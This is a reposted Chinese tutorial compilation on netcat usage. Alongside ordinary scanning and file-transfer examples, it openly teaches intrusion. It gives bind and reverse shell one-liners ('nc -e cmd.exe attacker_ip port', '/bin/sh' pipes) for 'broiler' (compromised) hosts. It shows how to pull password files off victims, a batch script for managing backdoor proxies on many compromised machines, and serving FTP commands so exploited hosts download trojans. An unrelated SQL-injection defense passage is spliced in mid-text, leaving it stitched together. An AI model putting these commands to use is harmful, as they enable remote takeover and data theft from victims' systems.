[From] https://blog.csdn.net/freeking101/article/details/53289198

NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,又被大家称为“瑞士军刀”。nc - TCP/IP swiss army knife

nc 常用于溢出、反向链接、上传文本等。其实是一个非标准的 telnet 客户端程序。也是一个 putty.exe 客户端程序。

socat 是一个 nc 的替代品,可以称为 nc++。是netcat的N倍加强版。socat 支持的连接方式很多,有 ip、tcp、udp、ipv6、pipe、exec、system、open proxy、openssl 等

功能说明:功能强大的网络工具

语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]
[-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
参  数:
-g<网关> 设置路由器跃程通信网关,最多可设置8个。
-G<指向器数目> 设置来源路由指向器,其数值为4的倍数。
-h 在线帮助。
-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。
-l 监听模式,用于入站连接 (监听本地端口)。
-n 直接使用IP地址,而不通过域名服务器。
-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p<通信端口> 设置本地主机使用的通信端口。
-r 随机指定本地与远端主机的通信端口。
-s<来源位址> 设置本地主机送出数据包的IP地址。
-u 使用UDP传输协议。
-v 显示指令执行过程。
-w<超时秒数> 设置等待连线的时间。
-z 使用0输入/输出模式,只在扫描通信端口时使用。 [root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-

1)端口扫描

nc -v -z host.example.com -            #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 192.168.228.222 -z -
root@~# nc -v -w 192.168.2.34 -z - # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port (tcp) failed: Connection refused
Connection to 192.168.2.34 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port (tcp) failed: Connection refused root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 -
root@10.1.1.43:~# nc -v -w 10.1.1.180
root@10.1.1.43:~# nc -v -w 10.1.1.180 -z - # 监听本地端口
root@10.1.1.43:~# nc -l -p
root@10.1.1.43:~# netstat -tunlp | grep
tcp 0.0.0.0: 0.0.0.0:* LISTEN /nc # 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0.0.0.0: 0.0.0.0:* LISTEN /sshd
udp 0.0.0.0: 0.0.0.0:* /dhclient root@172.16.211.35:~# nc -vuz 172.16.211.34
Connection to 172.16.211.34 port [udp/bootpc] succeeded! nc -p -w host.example.com
建立从本地1234端口到host.example.com的80端口连接,5秒超时
nc -u host.example.com
u为UDP连接

2) 远程拷贝文件

从server1拷贝文件到server2上。
先在server2上,用nc激活监听,server2上运行:
[root@hatest2 tmp]# nc -lp > install.log server1上运行:
[root@hatest1 ~]# ll install.log
-rw-r--r-- root root 12月 install.log
[root@hatest1 ~]# nc -w 192.168.228.222 < install.log 目的主机监听
nc -l 监听端口 > 要接收的文件名
nc -l > cache.tar.gz
源主机发起请求
nc 目的主机ip 目的端口
nc 192.168.0.85
netstat 如下
[root@localhost jiangbao]# netstat -tpln
tcp 0.0.0.0: 0.0.0.0:* LISTEN /nc 目录传输
从server1拷贝nginx-0.6.34目录内容到server2上。
先在server2上,用nc激活监听,server2上运行:
[root@hatest2 tmp]# nc -l |tar xzvf - server1上运行:
[root@hatest1 ~]# ll -d nginx-0.6.
drwxr-xr-x - : nginx-0.6.
[root@hatest1 ~]# tar czvf - nginx-0.6.|nc 192.168.228.222 从192.168.2.33拷贝文件到192.168.2.
在192.168.2.34上: nc -l > test.txt
在192.168.2.33上: nc 192.168.2.34 < test.txt 克隆硬盘或分区
操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。
所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工具光盘)启动系统后,
在server2上进行类似的监听动作:
# nc -l -p | dd of=/dev/sda
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:
# dd if=/dev/sda | nc 192.168.228.222

3) 简单聊天工具

在192.168.2.34上: nc -l
在192.168.2.33上: nc 192.168.2.34
这样,双方就可以相互交流了。使用ctrl+C(或D)退出。 nc -l
nc 127.0.0.1
在端口1234建立连接,互相发送输入

4) 保存Web页面

# while true; do nc -l -p  -q  < somepage.html; done

5) 模拟HTTP Headers

[root@hatest1 ~]# nc www.linuxfly.org  GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browser
HTTP/1.1 OK Date: Tue, Dec :: GMT Server: Apache/2.2. (Unix) DAV/ mod_mono/1.2. mod_python/3.2. Python/2.4. mod_perl/2.0. Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/ Expires: Cache-Control: no-store, no-cache, must-revalidate, post-check=, pre-check= Pragma: no-cache Cache-Control: private, post-check=, pre-check=, max-age= Set-Cookie: oWn_sid=xRutAY; expires=Tue, -Dec- :: GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html [......] 在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。 echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com
连接到主机并执行

6) 用nc命令操作memcached

)存储数据:printf “set key   6rnresultrn” |nc 192.168.2.34
)获取数据:printf “get keyrn” |nc 192.168.2.34
)删除数据:printf “delete keyrn” |nc 192.168.2.34
)查看状态:printf “statsrn” |nc 192.168.2.34
)模拟top命令查看状态:watch “echo stats” |nc 192.168.2.34
)清空缓存:printf “flush_allrn” |nc 192.168.2.34 (小心操作,清空了缓存就没了)

教程 2

来源:http://blog.csdn.net/xysoul/article/details/52270149

nc的使用方法

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。

软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows 
WINDOWS下版本号:[v1.10 NT]

参数介绍:

nc.exe -h 即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 设置路由器跃程通信网关,最多可设置8个。
-G num source-routing pointer: , , , ... 设置来源路由指向器,其数值为4的倍数。
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接 (监听本地端口)
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname。即直接使用IP地址,而不通过域名服务器。
-o file 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p port 本地端口号 (指定本地端口 )
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式(用telnet来回应 )
-u UDP模式
-v 详细输出--用两个-v( -vv)可得到更详细的内容. 获得端口信息
-w secs timeout的时间
-z 将输入输出关掉--只用于扫描. 端口的表示方法可写为M-N的范围格式。

基本用法:

大概有以下几种用法:

) 连接到 remote 主机,例子:
格式:nc -nvv 192.168.x.x
讲解:连到192..x.x的TCP80端口
) 监听 local 主机,例子:
格式:nc -l -p
讲解:监听本机的TCP80端口
) 扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x -
讲解:扫描192..x.x的TCP80到TCP445的所有端口
) remote 主机绑定 shell,例子:
格式:nc -l -p -t -e c:winntsystem32cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
) REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192..x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。
高级用法:
) 作攻击程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x
格式2:nc -nvv 192.168.x.x < c:exploit.txt
讲解:连接到192..x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
附:c:exploit.txt为shellcode等
) 作蜜罐用[],例子:
格式:nc -L -p
讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止.
) 作蜜罐用[],例子:
格式:nc -L -p > c:log.txt
讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>’改为‘>>’即可以追加日志。
附:c:log.txt为日志等
)作蜜罐用[],例子:
格式1:nc -L -p < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p
讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送’入其管道中。
如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,
欺骗系统授予访问权限。系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。
如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,
包括添加、删除或更新数据,甚至可能直接删除表。

二、如何防范?
好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。

⑴ 对于动态构造SQL查询的场合,可以使用下面的技术:

第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“Select * from Users Where login = or 1=1 AND password = or 1=1”显然会得到与“Select * from Users Where login = or 1=1 AND password = or 1=1”不同的结果。

第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“Select * from Users Where login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。

第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。

⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。

⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。

⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。

在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。

⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。

⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。

nc -l -v -p
打开本地的7626端口进行监听,并反馈连接信息。
如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象。再加个批处理文件一起用的话就是一个“小猪快跑”了。 nc -l -p >>c:\\日志.dat
如果要监视是否有入侵本地80端口的行为,并记下来用这个命令。这样,凡是有针对本机80端口的攻击都会被记录下来的 nc -l -p -e cmd.exe 或者是: nc -l -p -t
如果你通过溢出进入了别人的机器,就可以运行上面命令。作用都是以cmd.exe来响应到机器上123端口的连接。
这样就把溢出的主机变成了一台telnet肉鸡了。也可以用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.
在肉鸡上运行: nc -e cmd.exe 192.168.0.1 。再在本地机器上运行: nc -l -p
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。你再在本地机上监听777端口,这样就进入了对方的cmd了
这也微十时毫 反弹端口式木马的原理了。 nc -v 192.168.0.25
获取192.168.0.25的80端口的信息。可以获得IIS版本等很多重要信息 的 nc -v -z 192.168.0.25 -
扫描192.168.0.25的1到100间的TCP端口
nc -v -z -u 192.168.0.25 -
这是扫描1到00间的UDP端口 nc -vv ip port //端口的刺探:
RIVER [192.168.0.198] (?) open //显示是否开放open 扫描器
nc -vv -w ip port-port port
nc -vv -z ip port-port port
  这样扫描会留下大量的痕迹,系统管理员会额外小心。 后门
victim machine: // 受害者的机器
nc -l -p port -e cmd.exe // win2000
nc -l -p port -e /bin/sh // unix,linux
attacker machine: // 攻击者的机器.
nc ip -p port // 连接victim_IP,然后得到一个shell。 反向连接
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1
nc -vv -l -p prot2
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
139要加参数-s(nc.exe -L -p -d -e cmd.exe -s 对方机器IP),这样就可以保证nc.exe优先于NETBIOS。 传送文件:
attacker machine <-- victim machine //从肉鸡拖密码文件回来.
nc -d -l -p port < path\filedest     可以shell执行
nc -vv attacker_ip port > path\file.txt 需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
attacker machine --> victim machine //上传命令文件到肉鸡
nc -vv -l -p port > path\file.txt      需要Ctrl+C退出
nc -d victim_ip port < path\filedest   可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆. 端口数据抓包.
nc -vv -w -o test.txt xfocus.Net -
< 6e 6f # Syntax error
< 2c 6f 6d 6d 6e 6e # , command "" unr
< 6f 6e 7a 2e 0d 0a # ecognized...
< 8f # .....
telnet,自动批处理。
nc victim_ip port < path\file.cmd   显示执行过程.
nc -vv victim_ip port < path\file.cmd   显示执行过程.
nc -d victim_ip port < path\file.cmd 安静模式.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port
net start sksockserver
exit
_______________file.cmd__END___________________
########################################
管理肉鸡,更改肉鸡设置
########################################
) 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver",使用winshell后门. 端口1234 密码password
命令格式就是:
modi.bat youip.txt
___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END
:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%\system32\ >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd
:auto
@for /f "eol=; tokens=1,2" %%i in (%) do @(nc.exe -vv -w %%i < a.cmd)
:END
___________modi.bat__END_______________________
)
@echo off
color f0
:start
cls
C:\nc -vv -w -l -p >>.txt
goto start
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。
这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.
  肉鸡特征:
  。unicode漏洞
  。guest密码为空,administrators组用户
  。其他漏洞

用于传输文件 — ncp

#! /bin/sh
## 类似于rcp,但是是用netcat在高端口做的
## 在接收文件的机器上做"ncp targetfile"
## 在发送文件的机器上做"ncp sourcefile receivinghost"
## 如果调用了 "nzp" ,会将传输文件压缩
## 这里定义你想使用的端口,可以自由选择
MYPORT=
## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改
# PATH=$:$ ; export PATH
## 下面这几行检查参数输入情况:
test "$3" && echo "too many args" && exit
test ! "$1" && echo "no args?" && exit
me=`echo $ | sed s+.*/++`
test "$me" = "nzp" && echo [compressed mode]
# if second arg, its a host to send an [extant] file to.
if test "$2" ; then
test ! -f "$1" && echo "cant find $1" && exit
if test "$me" = "nzp" ; then
  compress -c < "$1" | nc -v -w $ $MYPORT && exit
else
  nc -v -w $ $MYPORT < "$1" && exit
fi
echo "transfer FAILED!"
exit
fi
# 是否在接收文件机器当前目录有同名文件
if test -f "$1" ; then
echo -n "Overwrite $1? "
read aa
test ! "$aa" = "y" && echo "[punted!]" && exit
fi
# seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
# 注意这里nc的用法,结合了重定向符号和管道
nc -v -w -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit
else
nc -v -w -p $MYPORT -l < /dev/null > "$1" && exit
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $ is already trashed
rm -f "$1"
exit
这样的话,我只要在A机器上先 QuackA# ncp ../abcd
listening on 然后在另一台机器B上
QuackB#ncp abcd 192.168.0.2
quackb [192.168.0.1] (?)
A机上出现
open connect to [192.168.0.2] from quackb [192.168.0.1]
# 查看一下,文件传输完毕。
===========================================================================
【本地运行】nc -v ip port
【命令解释】扫瞄某 IP 的某个端口,返回信息详细输出。
===========================================================================
【本地运行】nc -v -z ip port-port
【命令解释】扫描某IP的端口到某端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -v -z -u ip port-port
【命令解释】扫描某 IP 的某 UDP 端口到某 UDP 端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -l -p
【命令解释】开启本机的 TCP 端口并监听。
===========================================================================
【本地运行】nc -l -v -p
【命令解释】开启本机的 TCP 端口并将监听到的信息输出到当前 CMD 窗口。
===========================================================================
【本地运行】nc -l -p > E:/log.dat
【命令解释】开启本机的 TCP 端口并将监听到的信息输出到 E:/log.dat 下的日志文件里。
===========================================================================
【本地运行】nc -nvv 192.168.1.101
【命令解释】连接到192.168.1.101主机的 端口。
===========================================================================
【本地运行】nc -nvv -w2 -z 192.168.1.101 -
【命令解释】扫锚192.168.1.101的80-1024端口,连接超时时间为2秒。
===========================================================================
【远程运行】nc -l -p -t -e cmd.exe
【本地运行】nc -nvv 192.168.1.101
【命令解释】采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.101)上运行 nc -l -p -t -e cmd.exe 意为绑定远程主机的 CMD 到
【命令解释】 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 用于
【命令解释】连接已经将 CMD 重定向到 端口的远程主机(注:假设IP地址为 192.168.1.101)。
===========================================================================
【本地运行】nc -l -p
【远程运行】nc -t -e cmd.exe 192.168.1.102
【命令解释】采用反向连接方式,先在本地主机运行 nc -l -p 开启本地主机的(注:假设IP地址为 192.168.1.102) 端口并监听等待远程主
【命令解释】机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为
【命令解释】 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。
===========================================================================
【本地运行】nc -v -n ip port < C:/sunzn.exe
【远程运行】nc -v -l -p port > D:/sunzn.exe
【命令解释】在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的
【命令解释】对应端口上(注:命令行中的 IP 为接收文件的远程主机 IP ),在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并
【命令解释】把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。
===========================================================================
【本地运行】nc -L -p <C:\ftp.txt ( ftp.txt 中为FTP自动下载命令)
【命令解释】不停地监听 端口,并把 C:\ftp.txt 中的内容发给任何一台连接本机 端口的主机,可起到传送文件作用(此用法经常用于反向
【命令解释】溢出)。溢出远程主机时,一旦溢出的远程主机连接本地主机 端口,远程主机就会自动用 FTP 下载指定的文件,如木马。
===========================================================================

简单使用教程:

命令1:监听命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
参数解释:
-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息
提示:一般大家都爱用-vv nc -l -p //这个很简单,监听80端口。如果机器上运行这个命令,端口80被认为是开放的,可以欺骗扫描器
nc -l -p > e:\log.dat //将详细信息写入E盘log.dat的日志文件
nc -l -v -p //和上边命令相似,会直接显示信息在运行着NC的屏幕上。 实践:
例如:nc -l -v -p
然后在浏览器中输入本机IP:127.0.0.1 命令2:程序定向(反弹shell的方法)
nc -l -p port -t -e cmd.exe
本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port
参数解释:
-l、-p两个参数已经解释过了
-e;作用就是程序定向
-t:以telnet的形式来应答
例子
nc -l -p -t -e cmd.exe //千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了。
命令解释:
监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,
当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。
例如用法:
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
什么叫反弹端口?
就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,
而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。 本地运行:nc -l -p (监听本地5277端口)或者 nc -l -v -p
然后在远程机器上,想办法运行 nc -e cmd.exe ip
(你可别真的打“ip”在肉鸡上啊)要打,xxx.xxx.xxx.xxx这样!!
这样就是反弹~~在本地机器上得到了一个SHELL 命令3:扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释:
-z:将输入输出关掉,在扫描时使用
nc -v ip port //这个命令是针对某一个端口进行扫描
例如:
nc -v ip //扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息
例如:80端口
nc -v ip 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port //这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围
例如:
nc -v -z ip - //可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port //这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多一个-u的参数,是用来扫UDP端口的
例如:
nc -v -z -u ip - //这个命令就会扫1-200的UDP端口 命令4:传送文件(HOHO,I LIKE)
LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe
参数解释:
-n:指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先,在远程机上运行命令:
nc -v -l -p > c:\pulist.exe
这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口
并把接受到的信息数据写到c:\pulist.exe中
这时候在本地机上运行
nc -v -n ip < e:\hack\pulist.exe
这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上
这样远程主机就会自动创建一个pulist.exe文件。

[转] linux nc命令的更多相关文章

  1. linux nc命令使用详解(转)

    linux nc命令使用详解 功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o& ...

  2. linux nc 命令详解

    linux nc命令使用详解 功能说明:功能强大的网络工具语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o&l ...

  3. (转)linux nc命令使用详解

    linux nc命令使用详解 原文:https://www.2cto.com/os/201306/220971.html 功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网 ...

  4. Linux nc命令详解

    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具,可通 ...

  5. Linux nc命令用法收集

    ps.ubuntu自带的nc是netcat-openbsd版,不带-c/-e参数. pss.在线Markdown编辑器的bug是怎么回事...“#”号依然显示着 ##参数 想要连接到某处: nc [- ...

  6. linux nc命令使用详解

    功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p ...

  7. linux nc命令

    即NetCat简写,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具 ...

  8. Linux nc 命令传输文件

    NAME nc - arbitrary TCP and UDP connections and listensSYNOPSIS     nc [-46DdhklnrStUuvz] [-i interv ...

  9. Linux Shell脚本编程--nc命令使用详解

    linux nc命令使用详解     功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>] ...

随机推荐

  1. easyui combogrid 多选加载,保存,显示代码

    1.调用代码 UTIL.SetDict($("#txt_ExcludeIndustry_"), "SECTOR_TYPE", true, true, funct ...

  2. 白盒测试实践项目(day2)

    到目前为止: 李建文同学大体完成代码复审,并在完善文档,汪鸿同学和杨瑞丰同学都在熟悉各自的任务,胡俊辉同学设计了JUnit测试用例,张颖同学负责维护这几天的博客. 目前小组成员还未碰到不能解决的问题. ...

  3. centos环境下如何导出数据库

    MySQL数据库的导入导出可以用数据库备份工具mysqldump mysqldump工具是mysql自带的一个非常方便的一款小工具,存在mysql安装目录的/usr/local/mysql/bin ( ...

  4. mysql 数学操作函数

    -- 绝对值,圆周率 SELECT ABS(-1),3*PI() -- 平方根,求余 SELECT SQRT(9),MOD(9,5) -- 获取整数的函数 SELECT CEIL(12.145),CE ...

  5. 浅谈https\ssl\数字证书

    全球可信的SSL数字证书申请:http://www.shuzizhengshu.com 在互联网安全通信方式上,目前用的最多的就是https配合ssl和数字证书来保证传输和认证安全了.本文追本溯源围绕 ...

  6. hadoop之MapReduce学习

    为什么需要MapReduce 进行分析数据,计算方便和复用性强:而且是文件级别的 进程包括三个 mrappmaster:负责整个程序管理 maptask:负责map阶段的整个过程 reducemask ...

  7. alpha七天冲刺计划-第一天

    alpha七天冲刺计划-第一天 一.团队会议: 内容:具体分配任务到个人,预估项目时间,确定UI样式. 合照: 二.团队成员任务认领: 李尤:界面UI设计. 彭迪彬:HTML+CSS部分实现. 任路乾 ...

  8. 7z文件格式及其源码的分析(二)

    这是第二篇, 第一篇在这里: 这一篇开始分析7z的源码结构. 一. 准备工作: 1. 源码下载: 可以从官方中文主页下载:http://sparanoid.com/lab/7z/. 为了方便, 这里直 ...

  9. MIPS rev.1 指令参数

    由于MIPS各个版本之间的操作数会变,如果出现无法识别的情况 需要根据官方的MIPS instruction手册逐条核对,此处的版本为Rev.1 //******MIPS-55*********// ...

  10. dataset数据导出到Excel

    1.将数据写入HTTP输出流/这样子导出以后的数据全在一行中 public void CreateExcel(DataSet ds, string FileName) { HttpResponse r ...